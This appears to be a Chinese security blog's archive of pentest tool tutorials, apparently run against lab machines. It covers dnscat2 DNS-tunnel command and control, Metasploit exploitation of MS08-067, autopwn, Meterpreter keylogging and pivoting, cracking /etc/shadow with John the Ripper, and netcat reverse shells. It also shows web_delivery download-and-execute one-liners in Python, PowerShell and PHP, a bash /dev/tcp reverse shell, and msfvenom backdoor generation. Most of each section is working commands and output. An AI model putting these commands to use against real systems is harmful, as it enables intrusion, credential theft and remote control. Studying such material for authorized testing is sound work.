分类目录归档:安全工具

GitHub泄露监控系统Hawkeye

Github作为渗透测试中较为常用的打开突破口的点,由员工安全意识不足导致的敏感信息泄露,例如运维人员上传的脚本中有个人Mail邮箱账号密码,登陆后可以导出通信录继续暴力爆破,然后导出邮件内容搜索VPN等关键字获取一些关键信息。
Github的搜索可以自由组合一些关键字,例如:

"test.com" "smtp"
"test.com" "mail"
"test.com" "mysql"
"test.com" "jdbc"
"test.com" "svn"
"test.com" "pop"
"test.com" "ftp"

"test.com" "user"
"test.com" "username"
"test.com" "账号"

"test.com" "password"
"test.com" "passwd"
"test.com" "pwd"
"test.com" "pass"
"test.com" "密码"

"test.com" "内部"

推荐的一套GitHub泄露监控系统,地址:

https://github.com/0xbug/Hawkeye

克隆项目到本地

git clone https://github.com/0xbug/Hawkeye.git --depth 1

安装依赖 (修改/usr/local/bin/python3 为你系统的Python 3 路径)

cd Hawkeye
pip install virtualenv
virtualenv --python=/usr/local/bin/python3 venv
source venv/bin/activate
pip install -r deploy/requirements.txt

配置文件

cp config.ini.example config.ini
vim config.ini

github 帐户配置

[GitHub]
USERNAME = 帐号
PASSWORD = 密码

MongoDB 认证配置

yum install mongodb
/usr/local/mongodb/bin/mongod -dbpath=/usr/local/mongodb/data -logpath=/usr/local/mongodb/logs
> use Hawkeye
switched to db Hawkeye
> db.addUser("git","hehe123")
{
	"user" : "git",
	"readOnly" : false,
	"pwd" : "2cb2f4cc98430db51a2335446fa84930",
	"_id" : ObjectId("59accc87fff25e9f045afc45")
}

[MongoDB]
HOST = localhost
PORT = 27017
ACCOUNT = git
PASSWORD = hehe123

告警配置(ENABLE:是否开启告警功能)

[Notice]
ENABLE = 1
MAIL_SERVER = 邮件服务器
MAIL_PORT = smtp端口
FROM = 发件人
PASSWORD = 密码

python Hawkeye.py
然后访问 http://0.0.0.0:5000/ 进行关键词、告警、黑名单、定时任务配置

 

DNScat2:利用DNS隧道绕过防火墙

0x01 概述

内网出口一般对出站流量做了严格限制,但是通常不会限制DNS请求,也就是UDP 53请求,dnscat2就是一款利用DNS协议创建加密C&C通道来控制服务器的工具。dnscat2由客户端和服务端两部分组成。

当运行客户端时,需要指定一个域名。所有请求都将发送到本地DNS服务器,然后将转发至该域的权威DNS服务器。

如果你没有一个权威的DNS服务器,你也可以在直接连接UDP的53端口。这样速度更快,而且看起来仍然像普通的DNS查询,但是在请求日志中所有域名都是以dnscat开头。这种模式经常会被防火墙阻止。

服务端需要在权威DNS服务器上运行,与Client相同,需要指定域名。

 

0x02 部署

客户端

$ git clone https://github.com/iagox86/dnscat2.git

$ cd dnscat2/client/

$ make

服务端

yum install rubygems

gem install bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

 

0x03 使用

如果目标内网放行了所有的DNS请求,那么就可以直接指定HOST,通过UDP 53端口通信。

而如果目标内网只允许和受信任的DNS服务器通信时就需要申请注意域名,并将运行dnscat2 server的服务器指定为权威DNS服务器。这里我们以第一种情况为例:

 

服务端执行ruby ./dnscat2.rb

root@kali:/tmp/dnscat2/server# ruby ./dnscat2.rb



New window created: 0

New window created: crypto-debug

dnscat2> Welcome to dnscat2! Some documentation may be out of date.



auto_attach => false

history_size (for new windows) => 1000

Security policy changed: All connections must be encrypted

New window created: dns1

Starting Dnscat2 DNS server on 0.0.0.0:53

[domains = n/a]...



It looks like you didn't give me any domains to recognize!

That's cool, though, you can still use direct queries,

although those are less stealthy.



To talk directly to the server without a domain name, run:



  ./dnscat --dns server=x.x.x.x,port=53 --secret=eca54e475210239dc87a7c9f2516c89a



Of course, you have to figure out <server> yourself! Clients

will connect directly on UDP port 53.

客户端执行:

[root@vincenthostname client]# ./dnscat --dns server=172.16.100.182,port=53 --secret=eca54e475210239dc87a7c9f2516c89a

Creating DNS driver:

 domain = (null)

 host   = 0.0.0.0

 port   = 53

 type   = TXT,CNAME,MX

 server = 172.16.100.182



** Peer verified with pre-shared secret!



Session established!

然后服务端可以看到连接建立

New window created: 1

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

dnscat2> session -i 1

New window created: 1

history_size (session) => 1000

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a command session!



That means you can enter a dnscat2 command such as

'ping'! For a full list of clients, try 'help'.

查看支持的命令

command (vincenthostname) 1> help



Here is a list of commands (use -h on any of them for additional help):

* clear

* delay

* download

* echo

* exec

* help

* listen

* ping

* quit

* set

* shell

* shutdown

* suspend

* tunnels

* unset

* upload

* window

* windows

Shell环境

command (vincenthostname) 1> shell

Sent request to execute a shell

command (vincenthostname) 1> New window created: 2

Shell session created!



command (vincenthostname) 1> session -i 2

New window created: 2

history_size (session) => 1000

Session 2 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a console session!



That means that anything you type will be sent as-is to the

client, and anything they type will be displayed as-is on the

screen! If the client is executing a command and you don't

see a prompt, try typing 'pwd' or something!



To go back, type ctrl-z.



sh (vincenthostname) 2> whoami

sh (vincenthostname) 2> root

sh (vincenthostname) 2> cat /etc/issue

sh (vincenthostname) 2> CentOS release 6.5 (Final)

Kernel \r on an \m

下载文件

command (vincenthostname) 1> download /tmp/1.sh

Attempting to download /tmp/1.sh to 1.sh

command (vincenthostname) 1> Wrote 51 bytes from /tmp/1.sh to 1.sh!

root@kali:/tmp/dnscat2/server# ls 1.sh

1.sh

通信数据包如下:

可以看到域名是dnscat开头

 

0x04 使用PowerShell客户端通信

服务端

ruby ./dnscat2.rb --dns "domain=test,host=172.16.100.182" --no-cache

客户端

下载地址:https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1

powershell下执行

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Start-Dnscat2 -Domain test -DNSServer 172.16.100.182

 

0x05 防御

1)防火墙上限制只允许与受信任的 DNS 服务器通信

2)上文提到默认的dnscat查询中包含了dnscat字符串,这个可以作为防火墙和入侵检测的特征

3)记录DNS查询日志,通过频率、长度、类型监控异常日志

 

参考文章:

https://www.anquanke.com/post/id/85764

 

 

 

 

kali下msf自动攻击

一、数据库连接配置
1)开启服务
service postgresql start
查看端口5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2)进入postgresql配置
sudo -u postgres psql
alter user postgres with password ‘admin’;
3)修改linux系统的postgres用户的密码(密码与数据库用户postgres的密码相同)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4)管理PostgreSQL用户和数据库
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password ‘admin’ nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5)msf配置连接
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background…
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6)配置自动连接
修改/usr/share/metasploit-framework/config/database.yml
development: &pgsql
adapter: postgresql
database: msf
username: msf
password: admin
host: localhost
port: 5432
pool: 5
timeout: 5
输入db_status验证一下数据库连接
msf > db_status
[*] postgresql connected to msf

二、扫描入库
在msfconsole中使用db_nmap命令启动扫描,可以将结果自动存储在数据库中。
msf > db_nmap -sS -A 172.16.100.134
查看扫描结果
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host port proto name state info
—- —- —– —- —– —-
172.16.100.134 22 tcp ssh open OpenSSH 5.3 protocol 2.0
172.16.100.134 23 tcp telnet open
172.16.100.134 80 tcp http open Apache httpd 2.2.15 (CentOS)
172.16.100.134 111 tcp rpcbind open 2-4 RPC #100000
172.16.100.134 873 tcp rsync open protocol version 30
172.16.100.134 2222 tcp tcpwrapped open
查看数据库中的目标信息
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
172.16.100.134 00:0c:29:b0:78:39 Linux 2.6.X server
可以使用hosts -d ip来删除IP
查看msf版本
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
4.5以前的版本已经移除了db_autopwn自动化攻击。下载
http://download.csdn.net/download/terrying/5063334
放到/usr/share/metasploit-framework/plugins下。
db_autopwn -t -p -e(自动工具所有的ip)
msf > db_autopwn -t -p -e
然后可以看到获得了meterpreter
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800

使用metasploit测试MS08-067漏洞

1)MS08-067描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta。
2)漏洞利用
测试环境:Windows 2000
先使用nmap扫描一下:
C:\Users\dell>nmap -sS -A –script=smb-check-vulns –script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
可以看到提示MS08-067: VULNERABLE
然后使用metasploit
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >

meterpreter命令详解

基本命令:
background # 让meterpreter处于后台模式
sessions -i number # 与会话进行交互,number表示第n个session
quit # 退出会话
shell # 获得命令行

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

 

cat c:\\boot.ini # 查看文件内容
getwd # 查看当前工作目录 work directory
upload /root/Desktop/netcat.exe c:\\ # 上传文件到目标机上
download 0xfa.txt /root/Desktop/ # 下载文件到本机上
edit c:\\boot.ini # 编辑文件
search -d d:\\www -f web.config # search 文件
ps # 查看当前活跃进程
migrate pid # 将Meterpreter会话移植到进程数为pid的进程中

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
getpid # 获取当前进程的pid
kill pid # 杀死进程
getuid # 查看权限
sysinfo # 查看目标机系统信息,如机器名,操作系统等
getsystem #提权操作
timestompc:/a.doc -c “10/27/2015 14:22:11” #修改文件的创建时间

键盘记录:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

端口转发:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

然后查看本地监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

内网渗透pivot:

是meterpreter最常用的一种代理,可以轻松把你的机器代理到受害者内网环境。
在Windows2003虚拟机上新建一块网卡,然后选择主机模式,配置不同网段10.11.100.1,kali是访问不了这个网段的。

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

或者可以在meterpreter中直接添加路由

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

这时候就可以使用其他的模块对内网进行渗透了,但是如果想要其他的应用可以访问到内网,这里使用auxiliary/server/socks4a模块,需要注意Proxychains不支持ICMP,所以在代理使用NMAP的时候需要使用 -sT -Pn参数。

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

然后看一下端口监听

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
添加socks4 127.0.0.1 1080

然后使用proxychains nmap -sS -v 10.11.100.1就可以对内网进行扫描了

John the Ripper1.8安装使用

1)安装:
根据官方文档:
1、wget http://www.openwall.com/john/j/john-1.8.0.tar.gz
2、tar xzvf john-1.8.0.tar.gz
3、cd john-1.8.0
4、cd src
5、make
6、make clean generic
2)Linux下的使用方法
1、cd ../run/
2、cp /etc/passwd /etc/shadow . //注意后面一个. 说明是复制到当前目录
3、./unshadow passwd shadow >mypasswd
4、./john mypasswd
####################################################
但是执行报错
[root@server120 run]# ./john mypasswd
No password hashes loaded (see FAQ)
解决办法如下
1、cd src
2、make
3、make linux-x86-64
####################################################
3)破解模式
-single
假如账户名是admin,它的密码是admin+一些数字像123,000等,我们就可以采用这种破解模式,在john.conf中的[List.Rules:Single]中定义规则。
john –single mypasswd
可以加载多个密码文件
john –single passwd1 passwd2
或者john –single *passwd* *.pwd
-wordlist
采用字典进行破解,字典在/john-1.*/run/password.lst,可以手工生成一个字典加载到里面
[root@server120 run]# ./john –wordlist=password.txt mypasswd
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
hehe123 (vincent)
1g 0:00:00:00 100% 11.11g/s 33.33p/s 66.66c/s 66.66C/s xyxyxyxyx..hehe123
Use the “–show” option to display all of the cracked passwords reliably
Session completed
查看结果
[root@server120 run]# ./john –show mypasswd
vincent:hehe123:501:501::/home/vincent:/bin/bash

1 password hash cracked, 1 left
可以开启字典规则变化功能–rules,例如针对单词cook,会尝试cook、c00k、cooker等其他单词,详细的规则记录在[List.Rules:Wordlist]中
-increasemental
这个破解模式会尝试所有的字符组合,然后作为密码来破解,当然时间是相当久的。
-external
这个可以加载c语言等写的程序,通过这个程序进行破解。
如果直接执行./john mypasswd会先尝试single crack,然后尝试字典破解,最后尝试字符穷举破解。

参考文章:http://www.openwall.com/john/doc/EXAMPLES.shtml

渗透测试中nc的使用

nc的安装

1.利用wget从sourceforge下载一个nc
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
2.解压
tar zxvf netcat-0.7.1.tar.gz
3.编译前配置
cd netcat-0.7.1
./configure
4.编译
make
5.运行
安装完成后进入src目录
./netcat -h

nc传输文件

在接收机器上执行
[vincent@iZ62luqzx5xZ src]$ ./netcat -v -l -p 2345 > /tmp/user.txt
在发送机器上执行
root@kali-vincent:/tmp# nc -v 49.213.15.229 2345 < user.txt

nc反弹shell

正向连接:
在远程机器上执行:
nc -l -p 8888 -t -e cmd.exe
在本地机器上执行:
nc -nvv 172.16.100.111 8888
成功之后,本地机器就获得一个远程机器的shell。

反向连接:
首先在本地使用nc开启端口监听
nc -vv -l -p 8081
然后在远端:
nc -vv 192.168.192.201 8081 -e /bin/bash
本地即可获取到shell

在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个
GAPING_SECURITY_HOLE常量),也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制
在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:
root@kali-vincent:~# mknod /tmp/backpipe p
root@kali-vincent:~# /bin/sh 0</tmp/backpipe | nc 49.213.15.229 2345 1>/tmp/backpipe
第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入
重定向给刚才创建的管道,然后将输出通过nc attackerip
listenport重定向到攻击者一端,最后将shell的执行结果再重定向到管道中。

Metasploit Web Delivery

Metasploit的模块Web Delivery用于在Kali上启动Server服务,访问内容包含Payload。

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

在测试机执行该Python

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

测试机执行该powershell语句

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

获取到反弹shell

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671

Metasploit Framework msfvenom

msfvenom命令行选项如下:

Options:

-p, --payload <payload> 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
--platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out <path> 保存payload,可以用“>”号代替 
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项

–help-formats 查看msf支持的输出格式列表

root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

-f指定格式参数可以用单个大写字母代替:
例如:X 代表 -f exe

[H]arp
[P]erl
Rub[Y]
[R]aw
[J]s
e[X]e
[D]ll
[V]BA
[W]ar
Pytho[N]

先看一下payload,到目前共有437个payload,大致归类不同的操作平台windows/linux/osx/android和不同的编程语言python/php等。
root@kali:~# msfvenom -l payloads

查看支持编码
root@kali:~# msfvenom -l encoders
如果你使用了-b选项(设定了规避字符集),会自动调用编码器。
其他情况下,你需要使用-e选项来使用编码模块,例如:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
也可以使用-i选项进行多次编码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

下面演示一些用法:
Kali:172.16.100.182
测试机:172.16.100.155

PHP利用msfvenom生成后门


查看下php相关payload

msfvenom -l payloads | grep php

这里我们用bind_php来测试

php/bind_php Listen for a connection and spawn a command shell via php

查看配置项

root@kali:~# msfvenom -p php/bind_php --payload-options

生成后门

msfvenom -p php/bind_php RHOST=172.16.100.155 R

去掉开头的/*
访问http://172.16.100.155/1.php查看监听

[root@vincenthostname html]# netstat -antlp | grep httpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 1494/httpd

 

msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------



Payload options (php/bind_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address



Exploit target:

Id Name
-- ----
0 Wildcard Target



msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800

 

升级为Meterpreter

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433 
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell php/php 172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
2 meterpreter x86/linux uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155 172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer : 172.16.100.155
OS : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter : x86/linux

JAVA利用msfvenom生成后门


查看下可以使用的payload

msfvenom -l payloads | grep java

这里我们使用

java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes

访问后获取反弹shell

msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [°汾 6.1.7601]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

E:\tomcat\bin>whoami
whoami
dell-pc\dell

Windows利用msfvenom生成后门


root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe

本地监听:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345 
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo 
Computer : DELL-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32

Windows生成powershell后门


msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit 
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:6666

然后Windows下运行powershell -file “test.ps1”

msf exploit(handler) > 
[*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell

参考文章
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm

【Sqlmap】sqlmapapi的使用

sqlmapapi作为自动化分布式的工具,提供了不少便利。

sqlmapapi的参数:
[root@CentOS sqlmap-master]# python sqlmapapi.py -h
Usage: sqlmapapi.py [options]

Options:
-h, –help show this help message and exit
-s, –server Act as a REST-JSON API server
-c, –client Act as a REST-JSON API client
-H HOST, –host=HOST Host of the REST-JSON API server
-p PORT, –port=PORT Port of the the REST-JSON API server

sqlmapapi的操作步骤:
[root@CentOS sqlmap-master]# python sqlmapapi.py -s
[15:16:14] [INFO] Running REST-JSON API server at ‘127.0.0.1:8775’.
[15:16:14] [INFO] Admin ID: cddf73b09c3e45fce0087b28d96d26ab
[15:16:14] [DEBUG] IPC database: /tmp/sqlmapipc-TwbxoE
[15:16:14] [DEBUG] REST-JSON API server connected to IPC database
[root@CentOS sqlmap-master]# curl http://127.0.0.1:8775/task/new
{
“taskid”: “6bccaf0fe2043330”,
“success”: true
}[root@CentOS sqlmap-master]# curl-H “Content-Type: application/json” -X POST -d ‘{“url”: “http://testphp.vulnweb.com/artists.php?artist=1”}’ http://127.0.0.1:8775/scan/6bccaf0fe2043330/start
{
“engineid”: 17618,
“success”: true
}
